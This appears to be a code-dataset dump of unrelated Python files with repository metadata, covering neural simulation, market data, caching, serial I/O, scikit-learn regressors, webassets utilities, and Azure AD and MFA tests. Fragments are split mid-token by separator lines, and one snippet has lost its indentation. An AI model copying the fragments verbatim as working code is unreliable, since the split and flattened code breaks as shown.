# The size of the output spike train equals NumOfNeuronsOutput and must be the same size of the NeuronGroup who is
# going to interface with the rest of the system to send spikes.
# The function must return all the NeuronGroup objects and all the Synapse objects this way:
# ([list of all NeuronGroups],[list of all Synapses])
# and the FIRST (index 0) NeuronGroup of the list MUST be the one where the OUTPUT spikes will be taken by the simulation.
#
# Here is also possible to use "dummy" NeuronGroups only to receive and/or send spikes.
my_neuron_input_number = 100
def main_NeuronGroup(input_Neuron_Group, simulation_clock):
print "main_NeuronGroup!" #DEBUG!
simclock = simulation_clock
Nr=NeuronGroup(my_neuron_input_number, model='v:1', reset=0, threshold=0.5, clock=simclock)
Nr.v=0
# SYNAPSES BETWEEN REAL NEURON NETWORK AND THE INPUT
Syn_iNG_Nr=Synapses(input_Neuron_Group, Nr, model='w:1', pre='v+=w', clock=simclock)
Syn_iNG_Nr[:,:]='i==j'
print "Total Number of Synapses:", len(Syn_iNG_Nr) #DEBUG!
Syn_iNG_Nr.w=1
MExt=SpikeMonitor(Nr) # Spikes sent by UDP
Mdummy=SpikeMonitor(input_Neuron_Group) # Spikes received by UDP
return ([Nr],[Syn_iNG_Nr],[MExt,Mdummy])
def post_simulation_function(input_NG, simulation_NG, simulation_SYN, simulation_MN):
"""
input_NG: the neuron group that receives the input spikes
simulation_NG: the neuron groups list passed to the system by the user function (main_NeuronGroup)
simulation_SYN: the synapses list passed to the system by the user function (main_NeuronGroup)
simulation_MN: the monitors list passed to the system by the user function (main_NeuronGroup)
This way it is possible to plot, save or do whatever you want with these objects after the end of the simulation!
"""
pass
figure()
raster_plot(simulation_MN[1])
title("Spikes Received by UDP")
show(block=True)
# savefig('output.pdf')
if __name__=="__main__":
my_simulation = BrianConnectUDP(main_NeuronGroup, NumOfNeuronsInput=my_neuron_input_number, post_simulation_function=post_simulation_function,
input_addresses=[("127.0.0.1", 18181, my_neuron_input_number)], simclock_dt=1, inputclock_dt=2, TotalSimulationTime=10000, sim_repetitions=0, brian_address=2)
|
dp0h/marketdata
|
marketdata/update.py
|
Python
|
mit
| 1,099 | 0.00364 |
# coding:utf-8
'''
Market data update functionality
'''
from __future__ import print_function
from datetime import datetime, timedelta
from symbols import Symbols
import yahoo
def update_marketdata(from_date=None, to_date=None, sym=Symbols()):
'''
Fetch latest market data and upate it in db
'''
for s in sym.symbols():
if not from_date:
from_date = datetime.now() - timedelta(days=10*365) # fetch market data for 10 years
if not to_date:
to_date = datetime.now() + timedelta(days=2) # use a future date since there might be issues with timezones
date = sym.last_date(s)
fdate = date + timedelta(days=1) if date is not None else from_date
(res, data) = yahoo.fetch_market_data(s, fdate, to_date)
if res:
sym.insert_historical_prices(s, [(x
|
[0], x[1], x[2], x[3], x[4], x[5], x[6]) for x in data])
else:
# Th
|
ere are several reasons update can fail: 1. No new data; 2. wrong symbol; 3. Other reason.
print('Failed updating symbol %s' % s)
|
charmoniumQ/EDGAR-research
|
edgar_code/cache.py
|
Python
|
mit
| 9,951 | 0.001306 |
from __future__ import annotations
import abc
import shutil
import functools
from pathlib import Path
import urllib.parse
from typing import (
Callable, Any, TypeVar, cast, Tuple, Dict, Optional,
Union, Hashable,
)
import logging
from edgar_code.types import PathLike, Serializer, UserDict
from edgar_code.util.picklable_threading import RLock
logger = logging.getLogger(__name__)
CacheKey = TypeVar('CacheKey')
CacheReturn = TypeVar('CacheReturn')
CacheFunc = TypeVar('CacheFunc', bound=Callable[..., Any])
class Cache:
@classmethod
def decor(
cls,
obj_store: Callable[[str], ObjectStore[CacheKey, CacheReturn]],
hit_msg: bool = False, miss_msg: bool = False, suffix: str = '',
) -> Callable[[CacheFunc], CacheFunc]:
'''Decorator that creates a cached function
>>> @Cache.decor(ObjectStore())
>>> def foo():
... pass
'''
def decor_(function: CacheFunc) -> CacheFunc:
return cast(
CacheFunc,
functools.wraps(function)(
cls(obj_store, function, hit_msg, miss_msg, suffix)
)
)
return decor_
disabled: bool
#pylint: disable=too-many-arguments
def __init__(
self,
obj_store: Callable[[str], ObjectStore[CacheKey, CacheReturn]],
function: CacheFunc,
hit_msg: bool = False, miss_msg: bool = False, suffix: str = ''
) -> None:
'''Cache a function.
Note this uses `function.__qualname__` to determine the file
name. If this is not unique within your program, define
suffix.
Note this uses `function.version` when defined, so objects of
the same functions of different versions will not collide.
'''
self.function = function
self.name = '-'.join(filter(bool, [
self.function.__qualname__,
suffix,
getattr(self.function, 'version', ''),
]))
self.obj_store = obj_store(self.name)
self.hit_msg = hit_msg
self.miss_msg = miss_msg
self.sem = RLock()
self.__qualname__ = f'Cache({self.name})'
self.disabled = False
def __call__(self, *pos_args: Any, **kwargs: Any) -> Any:
if self.disabled:
return self.function(*pos_args, **kwargs)
else:
with self.sem:
args_key = self.obj_store.args2key(pos_args, kwargs)
if args_key in self.obj_store:
if self.hit_msg:
logger.info('hit %s with %s, %s',
self.name, pos_args, kwargs)
res = self.obj_store[args_key]
else:
if self.miss_msg:
logger.info('miss %s with %s, %s',
self.name, pos_args, kwargs)
res = self.function(*pos_args, **kwargs)
self.obj_store[args_key] = res
return res
def clear(self) -> None:
'''Removes all cached items'''
self.obj_store.clear()
def __str__(self) -> str:
store_type = type(self.obj_store).__name__
return f'Cache of {self.name} with {store_type}'
ObjectStoreKey = TypeVar('ObjectStoreKey')
ObjectStoreValue = TypeVar('ObjectStoreValue')
class ObjectStore(UserDict[ObjectStoreKey, ObjectStoreValue], abc.ABC):
@classmethod
def create(
cls, *args: Any, **kwargs: Any
) -> Callable[[str], ObjectStore[ObjectStoreKey, ObjectStoreValue]]:
'''Curried init. Name will be applied later.'''
@functools.wraps(cls)
def create_(name: str) -> ObjectStore[ObjectStoreKey, ObjectStoreValue]:
return cls(*args, name=name, **kwargs) # type: ignore
return create_
def __init__(self, name: str) -> None:
super().__init__()
self.name = name
@abc.abstractmethod
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> ObjectStoreKey:
# pylint: disable=unused-argument,no-self-use
...
class MemoryStore(ObjectStore[Hashable, Any]):
def __init__(self, name: str):
# pylint: disable=non-parent-init-called
ObjectStore.__init__(self, name)
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> Hashable:
# pylint: disable=no-self-use
return to_hashable((args, kwargs))
class FileStore(MemoryStore):
'''An obj_store that persists at ./${CACHE_PATH}/${FUNCTION_NAME}_cache.pickle'''
def __init__(
self, cache_path: PathLike, name: str, serializer: Optional[Serializer] = None,
):
# pylint: disable=non-parent-init-called,super-init-not-called
ObjectStore.__init__(self, name)
if serializer is None:
import pickle
self.serializer = cast(Serializer, pickle)
else:
self.serializer = serializer
self.cache_path = pathify(cache_path) / (self.name + '_cache.pickle')
self.loaded = False
self.data = {}
def load_if_not_loaded(self) -> None:
if not self.loaded:
self.loaded = True
if self.cache_path.exists():
with self.cache_path.open('rb') as fil:
self.data = self.serializer.load(fil)
else:
self.cache_path.parent.mkdir(parents=True, exist_ok=True)
self.data = {}
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> Hashable:
# pylint: disable=no-self-use
return to_hashable((args, kwargs))
def commit(self) -> None:
self.load_if_not_loaded()
if self.data:
with self.cache_path.open('wb') as fil:
self.serializer.dump(self.data, fil)
else:
|
if self.cache_path.exists():
print('deleting ', self.cache_path)
self.cache_path.unlink()
def __setitem__(self, key: Hashable, obj: Any) -> None:
self.load_if_not_loaded()
super().__setitem__(key, obj)
self.commit()
def __delitem__(self, key: Hashable) -> None:
self.load_if_not_loaded()
super().__delitem__(key)
self.commit()
d
|
ef clear(self) -> None:
self.load_if_not_loaded()
super().clear()
self.commit()
class DirectoryStore(ObjectStore[PathLike, Any]):
'''Stores objects at ./${CACHE_PATH}/${FUNCTION_NAME}/${urlencode(args)}.pickle'''
def __init__(
self, object_path: PathLike, name: str,
serializer: Optional[Serializer] = None
) -> None:
# pylint: disable=non-parent-init-called
ObjectStore.__init__(self, name)
if serializer is None:
import pickle
self.serializer = cast(Serializer, pickle)
else:
self.serializer = serializer
self.cache_path = pathify(object_path) / self.name
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> PathLike:
if kwargs:
args = args + (kwargs,)
fname = urllib.parse.quote(f'{safe_str(args)}.pickle', safe='')
return self.cache_path / fname
def __setitem__(self, path: PathLike, obj: Any) -> None:
path.parent.mkdir(parents=True, exist_ok=True)
with path.open('wb') as fil:
self.serializer.dump(obj, fil)
def __delitem__(self, path: PathLike) -> None:
path.unlink()
def __getitem__(self, path: PathLike) -> Any:
with path.open('rb') as fil:
return self.serializer.load(fil)
def __contains__(self, path: Any) -> bool:
if hasattr(path, 'exists'):
return bool(path.exists())
else:
return False
def clear(self) -> None:
print('deleting')
if hasattr(self.cache_path, 'rmtree'):
cast(Any, self.cache_path).rmtree()
else:
shutil.rmtree(str(self.cache_path))
def to_hashable(obj: Any) -> Hashable:
'''Converts args and kwargs into a hashable type (overridable)
|
marplaa/SerialBus
|
python_lib/test_script/echo.py
|
Python
|
gpl-3.0
| 294 | 0.010204 |
from Serial
|
Bus import SerialBus
serialbus = SerialBus(baud = 19200, serialnum="ABCD")
while True:
cmd = input('Send: ')
answer = serialbus.send_request_wait(10, bytes(cmd, 'ascii'))
answer_str = "";
for char in answer:
answer_str
|
+= (chr(char))
print(answer_str)
|
mbayon/TFG-MachineLearning
|
venv/lib/python3.6/site-packages/sklearn/neighbors/regression.py
|
Python
|
mit
| 10,967 | 0 |
"""Nearest Neighbor Regression"""
# Authors: Jake Vanderplas <vanderplas@astro.washington.edu>
# Fabian Pedregosa <fabian.pedregosa@inria.fr>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Sparseness support by Lars Buitinck
# Multi-output support by Arnaud Joly <a.joly@ulg.ac.be>
#
# License: BSD 3 clause (C) INRIA, University of Amsterdam
import numpy as np
from .base import _get_weights, _check_weights, NeighborsBase, KNeighborsMixin
from .base import RadiusNeighborsMixin, SupervisedFloatMixin
from ..base import RegressorMixin
from ..utils import check_array
class KNeighborsRegressor(NeighborsBase, KNeighborsMixin,
SupervisedFloatMixin,
RegressorMixin):
"""Regression based on k-nearest neighbors.
The target is predicted by local interpolation of the targets
associated of the nearest neighbors in the training set.
Read more in the :ref:`User Guide <regression>`.
Parameters
----------
n_neighbors : int, optional (default = 5)
Number of neighbors to use by default for :meth:`kneighbors` queries.
weights : str or callable
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : integer, optional (default = 2)
Power parameter
|
for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : string or callable, default 'minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with
|
p=2 is equivalent to the standard Euclidean
metric. See the documentation of the DistanceMetric class for a
list of available metrics.
metric_params : dict, optional (default = None)
Additional keyword arguments for the metric function.
n_jobs : int, optional (default = 1)
The number of parallel jobs to run for neighbors search.
If ``-1``, then the number of jobs is set to the number of CPU cores.
Doesn't affect :meth:`fit` method.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import KNeighborsRegressor
>>> neigh = KNeighborsRegressor(n_neighbors=2)
>>> neigh.fit(X, y) # doctest: +ELLIPSIS
KNeighborsRegressor(...)
>>> print(neigh.predict([[1.5]]))
[ 0.5]
See also
--------
NearestNeighbors
RadiusNeighborsRegressor
KNeighborsClassifier
RadiusNeighborsClassifier
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
.. warning::
Regarding the Nearest Neighbors algorithms, if it is found that two
neighbors, neighbor `k+1` and `k`, have identical distances but
different labels, the results will depend on the ordering of the
training data.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
def __init__(self, n_neighbors=5, weights='uniform',
algorithm='auto', leaf_size=30,
p=2, metric='minkowski', metric_params=None, n_jobs=1,
**kwargs):
self._init_params(n_neighbors=n_neighbors,
algorithm=algorithm,
leaf_size=leaf_size, metric=metric, p=p,
metric_params=metric_params, n_jobs=n_jobs, **kwargs)
self.weights = _check_weights(weights)
def predict(self, X):
"""Predict the target for the provided data
Parameters
----------
X : array-like, shape (n_query, n_features), \
or (n_query, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : array of int, shape = [n_samples] or [n_samples, n_outputs]
Target values
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.kneighbors(X)
weights = _get_weights(neigh_dist, self.weights)
_y = self._y
if _y.ndim == 1:
_y = _y.reshape((-1, 1))
if weights is None:
y_pred = np.mean(_y[neigh_ind], axis=1)
else:
y_pred = np.empty((X.shape[0], _y.shape[1]), dtype=np.float64)
denom = np.sum(weights, axis=1)
for j in range(_y.shape[1]):
num = np.sum(_y[neigh_ind, j] * weights, axis=1)
y_pred[:, j] = num / denom
if self._y.ndim == 1:
y_pred = y_pred.ravel()
return y_pred
class RadiusNeighborsRegressor(NeighborsBase, RadiusNeighborsMixin,
SupervisedFloatMixin,
RegressorMixin):
"""Regression based on neighbors within a fixed radius.
The target is predicted by local interpolation of the targets
associated of the nearest neighbors in the training set.
Read more in the :ref:`User Guide <regression>`.
Parameters
----------
radius : float, optional (default = 1.0)
Range of parameter space to use by default for :meth:`radius_neighbors`
queries.
weights : str or callable
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : integer, optional (default = 2)
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance
|
0x1997/webassets
|
src/webassets/utils.py
|
Python
|
bsd-2-clause
| 6,584 | 0.001367 |
from webassets import six
import contextlib
import os
import sys
from itertools import takewhile
from .exceptions import BundleError
__all__ = ('md5_constructor', 'pickle', 'set', 'StringIO',
'common_path_prefix', 'working_directory')
if sys.version_info >= (2, 5):
import hashlib
md5_constructor = hashlib.md5
else:
import md5
md5_constructor = md5.new
try:
import cPickle as pickle
except ImportError:
import pickle
try:
set
except NameError:
from sets import Set as set
else:
set = set
from webassets.six import StringIO
try:
from urllib import parse as urlparse
except ImportError: # Python 2
import urlparse
import urllib
def common_path_prefix(paths, sep=os.path.sep):
"""os.path.commonpath() is completely in the wrong place; it's
useless with paths since it only looks at one character at a time,
see http://bugs.python.org/issue10395
This replacement is from:
http://rosettacode.org/wiki/Find_Common_Directory_Path#Python
"""
def allnamesequal(name):
return all(n==name[0] for n in name[1:])
bydirectorylevels = zip(*[p.split(sep) for p in paths])
return sep.join(x[0] for x in takewhile(allnamesequal, bydirectorylevels))
@contextlib.contextmanager
def working_directory(directory=None, filename=None):
"""A context manager which changes the working directory to the given
path, and then changes it back to its previous value on exit.
Filters will often find this helpful.
Instead of a ``directory``, you may also give a ``filename``, and the
working directory will be set to the directory that file is in.s
"""
assert bool(directory) != bool(filename) # xor
if not directory:
directory = os.path.dirname(filename)
prev_cwd = os.getcwd()
os.chdir(directory)
try:
yield
finally:
os.chdir(prev_cwd)
def make_option_resolver(clazz=None, attribute=None, classes=None,
allow_none=True, desc=None):
"""Returns a function which can resolve an option to an object.
The option may given as an instance or a class (of ``clazz``, or
duck-typed with an attribute ``attribute``), or a string value referring
to a class as defined by the registry in ``classes``.
This support arguments, so an option may look like this:
cache:/tmp/cachedir
If this must instantiate a class, it will pass such an argument along,
if given. In addition, if the class to be instantiated has a classmethod
``make()``, this method will be used as a factory, and will be given an
Environment object (if one has been passed to the resolver). This allows
classes that need it to initialize themselves based on an Environment.
"""
assert clazz or attribute or classes
desc_string = ' to %s' % desc if desc else None
def instantiate(clazz, env, *a, **kw):
# Create an instance of clazz, via the Factory if one is defined,
# passing along the Environment, or creating the class directly.
if hasattr(clazz, 'make'):
# make() protocol is that if e.g. the get_manifest() resolver takes
# an env, then the first argument of the factory is the env.
args = (env,) + a if env is not None else a
return clazz.make(*args, **kw)
return clazz(*a, **kw)
def resolve_option(option, env=None):
the_clazz = clazz() if callable(clazz) and not isinstance(option, type) else clazz
if not option and allow_none:
return None
# If the value has one of the support attributes (duck-typing).
if attribute and hasattr(option, attribute):
if isinstance(option, type):
return instantiate(option, env)
return option
# If it is the class we support.
if the_clazz and isinstance(option, the_clazz):
return option
elif isinstance(option, type) and issubclass(option, the_clazz):
return instantiate(option, env)
# If it is a string
elif isinstance(option, six.string_types):
parts = option.split(':', 1)
key = parts[0]
arg = parts[1] if len(parts) > 1 else None
if key in classes:
return instantiate(classes[key], env, *([arg] if arg else []))
raise ValueError('%s cannot be resolved%s' % (option, desc_string))
resolve_option.__doc__ = """Resolve ``option``%s.""" % desc_string
return resolve_option
def RegistryMetaclass(clazz=None, attribute=None, allow_none=True, desc=None):
"""Returns a metaclass which will keep a registry of all subclasses, keyed
by their ``id`` attribute.
The metaclass will also have a ``resolve`` method which can turn a string
into an instance of one of the classes (based on ``make_option_resolver``).
"""
def eq(self, other):
"""Return equality with config values that instantiate this."""
return (hasattr(self, 'id') and self.id == other) or\
id(self) == id(other)
def unicode(self):
return "%s" % (self.id if h
|
asattr(self, 'id') else repr(self))
class Metaclass(type):
REGISTRY = {}
def __new__(mcs, name, bases, attrs):
if not '__eq__' in attrs:
attrs['__eq__']
|
= eq
if not '__unicode__' in attrs:
attrs['__unicode__'] = unicode
if not '__str__' in attrs:
attrs['__str__'] = unicode
new_klass = type.__new__(mcs, name, bases, attrs)
if hasattr(new_klass, 'id'):
mcs.REGISTRY[new_klass.id] = new_klass
return new_klass
resolve = staticmethod(make_option_resolver(
clazz=clazz,
attribute=attribute,
allow_none=allow_none,
desc=desc,
classes=REGISTRY
))
return Metaclass
def cmp_debug_levels(level1, level2):
"""cmp() for debug levels, returns True if ``level1`` is higher
than ``level2``."""
level_ints = {False: 0, 'merge': 1, True: 2}
try:
cmp = lambda a, b: (a > b) - (a < b) # 333
return cmp(level_ints[level1], level_ints[level2])
except KeyError as e:
# Not sure if a dependency on BundleError is proper here. Validating
# debug values should probably be done on assign. But because this
# needs to happen in two places (Environment and Bundle) we do it here.
raise BundleError('Invalid debug value: %s' % e)
|
linkedin/WhereHows
|
metadata-ingestion/tests/integration/azure_ad/test_azure_ad.py
|
Python
|
apache-2.0
| 7,798 | 0.002949 |
import json
import pathlib
from unittest.mock import patch
from freezegun import freeze_time
from datahub.ingestion.run.pipeline import Pipeline
from datahub.ingestion.source.identity.azure_ad import AzureADConfig
from tests.test_helpers import mce_helpers
FROZEN_TIME = "2021-08-24 09:00:00"
def test_azure_ad_config():
config = AzureADConfig.parse_obj(
dict(
client_id="00000000-0000-0000-0000-000000000000",
tenant_id="00000000-0000-0000-0000-000000000000",
client_secret="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
redirect="https://login.microsoftonline.com/common/oauth2/nativeclient",
authority="https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
token_url="https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
graph_url="https://graph.microsoft.com/v1.0",
ingest_users=True,
ingest_groups=True,
ingest_group_membership=True,
)
)
# Sanity on required configurations
assert config.client_id == "00000000-0000-0000-0000-000000000000"
assert config.tenant_id == "00000000-0000-0000-0000-000000000000"
assert config.client_secret == "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
assert (
config.redirect
== "https://login.microsoftonline.com/common/oauth2/nativeclient"
)
assert (
config.authority
== "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000"
)
assert (
config.token_url
== "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token"
)
assert config.graph_url == "https://graph.microsoft.com/v1.0"
# assert on defaults
assert config.ingest_users
assert config.ingest_groups
assert config.ingest_group_membership
@freeze_time(FROZEN_TIME)
def test_azure_ad_source_default_configs(pytestconfig, tmp_path):
test_resources_dir: pathlib.Path = (
pytestconfig.rootpath / "tests/integration/azure_ad"
)
|
with patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource.get_token"
) as mock_token, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_users"
) as mock_users, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_groups"
) as mock_groups, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_group_users"
) as mock_group_users:
mocked_functions(
|
test_resources_dir, mock_token, mock_users, mock_groups, mock_group_users
)
# Run an azure usage ingestion run.
pipeline = Pipeline.create(
{
"run_id": "test-azure-ad",
"source": {
"type": "azure-ad",
"config": {
"client_id": "00000000-0000-0000-0000-000000000000",
"tenant_id": "00000000-0000-0000-0000-000000000000",
"client_secret": "client_secret",
"redirect": "https://login.microsoftonline.com/common/oauth2/nativeclient",
"authority": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
"token_url": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
"graph_url": "https://graph.microsoft.com/v1.0",
"ingest_group_membership": True,
"ingest_groups": True,
"ingest_users": True,
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/azure_ad_mces_default_config.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "azure_ad_mces_default_config.json",
golden_path=test_resources_dir / "azure_ad_mces_golden_default_config.json",
)
@freeze_time(FROZEN_TIME)
def test_azure_source_ingestion_disabled(pytestconfig, tmp_path):
test_resources_dir: pathlib.Path = (
pytestconfig.rootpath / "tests/integration/azure_ad"
)
with patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource.get_token"
) as mock_token, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_users"
) as mock_users, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_groups"
) as mock_groups, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_group_users"
) as mock_group_users:
mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_group_users
)
# Run an Azure usage ingestion run.
pipeline = Pipeline.create(
{
"run_id": "test-azure-ad",
"source": {
"type": "azure-ad",
"config": {
"client_id": "00000000-0000-0000-0000-000000000000",
"tenant_id": "00000000-0000-0000-0000-000000000000",
"client_secret": "client_secret",
"redirect": "https://login.microsoftonline.com/common/oauth2/nativeclient",
"authority": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
"token_url": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
"graph_url": "https://graph.microsoft.com/v1.0",
"ingest_group_membership": "False",
"ingest_groups": "False",
"ingest_users": "False",
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/azure_ad_mces_ingestion_disabled.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "azure_ad_mces_ingestion_disabled.json",
golden_path=test_resources_dir / "azure_ad_mces_golden_ingestion_disabled.json",
)
def load_test_resources(test_resources_dir):
azure_ad_users_json_file = test_resources_dir / "azure_ad_users.json"
azure_ad_groups_json_file = test_resources_dir / "azure_ad_groups.json"
with azure_ad_users_json_file.open() as azure_ad_users_json:
reference_users = json.loads(azure_ad_users_json.read())
with azure_ad_groups_json_file.open() as azure_ad_groups_json:
reference_groups = json.loads(azure_ad_groups_json.read())
return reference_users, reference_groups
def mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_groups_users
):
# mock token response
mock_token.return_value = "xxxxxxxx"
# mock users and groups response
users, groups = load_test_resources(test_resources_dir)
mock_users.return_value = iter(list([users]))
mock_groups.return_value = iter(list([groups]))
# For simplicity, each user is placed in ALL groups.
# Create a separate response mock for each group in our sample data.
mock_groups_users.return_value = [users]
# r = []
# for _ in groups:
# r.append(users)
# mock_groups_users.return_value = iter(r)
|
MicroPyramid/django-mfa
|
django_mfa/tests/test_models.py
|
Python
|
mit
| 2,572 | 0.001166 |
from django_mfa.models import *
from django.test import TestCase, Client
from django.contrib.auth.models import User
from django.contrib import auth
class Test_Models_Mfa_U2f(TestCase):
def setUp(self):
self.client = Client()
self.user = User.objects.create_user(
username='djangomfa@mp.com', email='djangomfa@mp.com', password='djangomfa')
self.userotp = UserOTP.objects.create(
otp_type='TOTP', user=self.user, secret_key='secret_key')
self.user_codes = UserRecoveryCodes.objects.create(user=UserOTP.objects.get(
user=self.user), secret_code="secret_code")
self.u2f_keys = self.user.u2f_keys.create(
public_key='publicKey',
key_handle='keyHandle',
app_id='https://appId',
)
self.client.login(username='djangomfa@mp.com', password="djangomfa")
def test_mfa_enabled(self):
self.assertTrue(is_mfa_enabled(auth.get_user(self.client)))
def test_u2f_enabled(self):
self.assertTrue(is_u2f_enabled(auth.get_user(self.client)))
def test_user_data_saved_correctly(self):
user_details = auth.get_user(self.client)
self.assertEqual(self.user.username, user_details.username)
self.assertEqual(self.user.email, user_details.email)
self.assertEqual(self.user.password, user_details.password)
def test_userotp_data_saved_correctly(self):
user_otp = UserOTP.objects.filter(
user=auth.get_user(self.client)).first()
self.assertEqual(self.userotp.otp_type, user_otp.otp_type)
self.assertEqual(self.userotp.user, user_otp.user)
self.assertEqual(self.userotp.secret_key, user_otp.secret_key)
def test_u2f_key_user(self):
user_u2f = U2FKey.objects.filter(
user=auth.get_user(self.client)).first()
self.assertEqual(self.u2f_keys.user, user_u2f.user)
self.assertEqual(self.u2f_keys.public_key, user_u2f.public_key)
self.asser
|
tEqual(self.u2f_keys.key_handle, user_u2f.key_handle)
self.assertEqual(self.u2f_keys.app_id, user_u2f.app_id)
def test_u2f_to_json_function(self):
user_u2f = U2FKey.objects.filter(
user=auth.get_user(self.client)).first()
self.assertEqual(self.u2f_keys.to_json(), user_u2f.to_json())
def test_recovery_codes_generated(self):
user_codes = UserRecoveryCodes.objects.filter(user=UserOTP.objects.filter(
|
user=auth.get_user(self.client)).first()).first()
self.assertEqual(self.user_codes, user_codes)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.